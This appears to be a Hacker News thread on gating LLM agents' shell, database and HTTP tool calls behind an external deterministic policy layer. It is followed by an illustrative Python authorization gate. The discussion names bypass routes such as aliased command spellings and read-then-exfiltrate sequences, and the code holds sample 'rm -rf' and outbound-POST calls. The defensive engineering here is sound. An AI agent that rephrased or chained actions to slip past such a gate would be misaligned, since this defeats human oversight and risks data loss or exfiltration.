
Ask HN: How are you handling non-probabilistic security for LLM agents?

2•amjadfatmi1•8h ago
I've been experimenting with autonomous agents that have shell and database access. The standard approach seems to be "put safety guardrails in the system prompt", but that feels like a house of cards honestly. If a model is stochastic, its adherence to security instructions is also stochastic.

I'm looking into building a hard "Action Authorization Boundary" (AAB) that sits outside the agent's context window entirely. The idea is to intercept the tool call, normalize it into an intent, and check that intent against a deterministic YAML policy before execution.

A few questions for those building in this space:

Canonicalization: How do you handle the messiness of LLM tool outputs? If the representation isn't perfectly canonical, the policy bypasses seem trivial.

Stateful Intent: How do you handle sequences that are individually safe but collectively risky? For example, an agent reading a sensitive DB (safe) and then making a POST request to an external API (dangerous exfiltration).

Latency: Does moving the "gate" outside the model-loop add too much overhead for real-time agentic workflows?

I’ve been working on a CAR (Canonical Action Representation) spec to solve this, but I’m curious if I'm overthinking it or if there’s an existing "firewall for agents" standard I'm missing.

Comments

yaront111•7h ago
I just built Cordum.io. It should give you 100% deterministic security, open sourced and free :)
amjadfatmi1•6h ago
Hey @yaront111, Cordum looks like a solid piece of infrastructure, especially the Safety Kernel and the NATS-based dispatch.

My focus with Faramesh.dev is slightly upstream from the scheduler. I’m obsessed with the Canonicalization problem. Most schedulers take a JSON payload and check a policy, but LLMs often produce semantic tool calls that are messy or obfuscated.

I’m building CAR (Canonical Action Representation) to ensure that no matter how the LLM phrases the intent, the hash is identical. Are you guys handling the normalization of LLM outputs inside the Safety Kernel, or do you expect the agent to send perfectly formatted JSON every time?

yaront111•6h ago
That’s a sharp observation. You’re partially right: CAP (our protocol) handles the structural canonicalization. We use strict Protobuf/Schematic definitions, so if an agent sends a messy JSON that doesn't fit the schema, it’s rejected at the gateway. We don't deal with 'raw text' tool calls in the backend.

But you are touching on the semantic aliasing problem (e.g. rm -rf vs rm -r -f), which is a layer deeper. Right now, we rely on the specific Worker to normalize those arguments before they hit the policy check, but having a universal 'Canonical Action Representation' upstream would be cleaner.

If you can turn 'messy intent' into a 'deterministic hash' before it hits the Cordum Scheduler, that would be a killer combo. Do you have a repo/docs for CAR yet?
amjadfatmi1•6h ago
Spot on, Yaron. Schematic validation (Protobuf) catches structural errors, but semantic aliasing (the 'rm -rf' vs 'rm -r -f' problem) is exactly why I developed the CAR (Canonical Action Representation) spec.

I actually published a 40-page paper (DOI: 10.5281/zenodo.18296731) that defines this exact 'Action Authorization Boundary.' It treats the LLM as an untrusted actor and enforces determinism at the execution gate.

Faramesh Core is the reference implementation of that paper. I’d love for you to check out the 'Execution Gate Flow' section; it would be a massive win to see a Faramesh-Cordum bridge that brings this level of semantic security to your orchestrator.

Code: https://github.com/faramesh/faramesh-core
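The following is an added example, not code from the post, from Faramesh, or from Cordum. It sketches the two mechanisms the thread circles around: the canonicalization step (so the `rm -rf` / `rm -r -f` aliasing raised by yaront111 and amjadfatmi1 collapses to one hash), and the stateful check from the post's "Stateful Intent" question (a sensitive DB read followed by an outbound POST is denied even though each step is allowed on its own). The working directory, the flag alias table, the policy contents, the tool-call shapes and every function name are illustrative assumptions; the sample calls at the bottom are constructed.

```python
import hashlib
import json
import os
import shlex
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Assumption: the agent's working directory, used to make relative paths absolute.
ASSUMED_CWD = "/work"

# Assumed alias table: every spelling of a flag a model might emit maps to one long form.
FLAG_ALIASES = {"rm": {"-r": "--recursive", "-R": "--recursive", "-f": "--force"}}

# Assumed policy (the post would load this from YAML with yaml.safe_load; kept inline here).
POLICY = {
    "shell": {
        "ls": {},
        "rm": {"deny_flags": ["--recursive"], "deny_paths": ["/etc", "/usr"]},
    },
    "db": {"sensitive_tables": ["users", "payments"]},
    # Once a sensitive table has been read, outbound requests may only target these hosts.
    "http": {"egress_after_sensitive_read": ["api.internal.example"]},
}


def canonicalize_shell(command: str) -> dict:
    """Parse a shell string into one canonical action, whatever the model's spelling."""
    argv = shlex.split(command)             # quote-aware: rm "-r" x == rm -r x
    if not argv:
        raise ValueError("empty command")
    prog = os.path.basename(argv[0])        # /bin/rm -> rm
    aliases = FLAG_ALIASES.get(prog, {})
    flags, args = set(), []
    for tok in argv[1:]:
        if tok.startswith("--"):
            flags.add(tok)
        elif tok.startswith("-") and len(tok) > 1:
            for ch in tok[1:]:              # bundled -rf -> -r, -f -> long forms
                flags.add(aliases.get("-" + ch, "-" + ch))
        else:                               # x/, /tmp/../tmp/x -> one absolute path
            args.append(os.path.normpath(os.path.join(ASSUMED_CWD, tok)))
    return {"kind": "shell", "prog": prog, "flags": sorted(flags), "args": args}


def canonicalize(call: dict) -> dict:
    """Turn a raw tool call into its canonical form; unknown tools fail closed."""
    tool = call["tool"]
    if tool == "shell":
        return canonicalize_shell(call["command"])
    if tool == "db.read":
        return {"kind": "db.read", "table": call["table"].strip().lower()}
    if tool == "http":
        host = urlsplit(call["url"]).hostname   # lower-cased, no path or scheme
        if host is None:
            raise ValueError("URL without host")
        return {"kind": "http", "method": call["method"].upper(), "host": host}
    raise ValueError(f"unknown tool {tool!r}")


def action_hash(action: dict) -> str:
    """Stable digest of the canonical form: same intent, same hash."""
    blob = json.dumps(action, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(blob.encode()).hexdigest()


@dataclass
class Session:
    """State the gate keeps outside the model's context window."""
    tainted_by: set = field(default_factory=set)   # sensitive tables already read


def authorize(action: dict, session: Session, policy: dict = POLICY) -> tuple:
    kind = action["kind"]
    if kind == "shell":
        rule = policy["shell"].get(action["prog"])
        if rule is None:
            return False, f"{action['prog']} not allowlisted"
        denied = set(action["flags"]) & set(rule.get("deny_flags", ()))
        if denied:
            return False, f"denied flags {sorted(denied)}"
        for path in action["args"]:
            for protected in rule.get("deny_paths", ()):
                if path == protected or path.startswith(protected + "/"):
                    return False, f"protected path {path}"
        return True, "ok"
    if kind == "db.read":
        if action["table"] in policy["db"]["sensitive_tables"]:
            session.tainted_by.add(action["table"])   # allowed alone, remembered for later
        return True, "ok"
    if kind == "http":
        allowed = policy["http"]["egress_after_sensitive_read"]
        if session.tainted_by and action["host"] not in allowed:
            return False, f"egress to {action['host']} after reading {sorted(session.tainted_by)}"
        return True, "ok"
    return False, f"unknown action kind {kind}"


def gate(call: dict, session: Session) -> tuple:
    """The boundary the agent loop calls before executing any tool: (ok, reason, hash)."""
    action = canonicalize(call)
    ok, reason = authorize(action, session)
    return ok, reason, action_hash(action)


if __name__ == "__main__":
    s = Session()
    # Constructed sample calls; the last two are the exfiltration sequence from the post.
    for call in [
        {"tool": "shell", "command": "rm -rf /tmp/x"},
        {"tool": "shell", "command": "/bin/rm --force -r /tmp/../tmp/x/"},
        {"tool": "db.read", "table": "Users"},
        {"tool": "http", "method": "post", "url": "https://Evil.example/upload"},
    ]:
        print(gate(call, s), call)
```

The gate is a pure function over the canonical form plus a small session object, with no model call and no network round trip, so the overhead the post asks about in its "Latency" question is string parsing and a hash, not a second inference. The important design choice is that anything the canonicalizer cannot model (an unknown tool, a URL without a host) raises rather than being passed through, so the policy is only ever evaluated on input it fully understands.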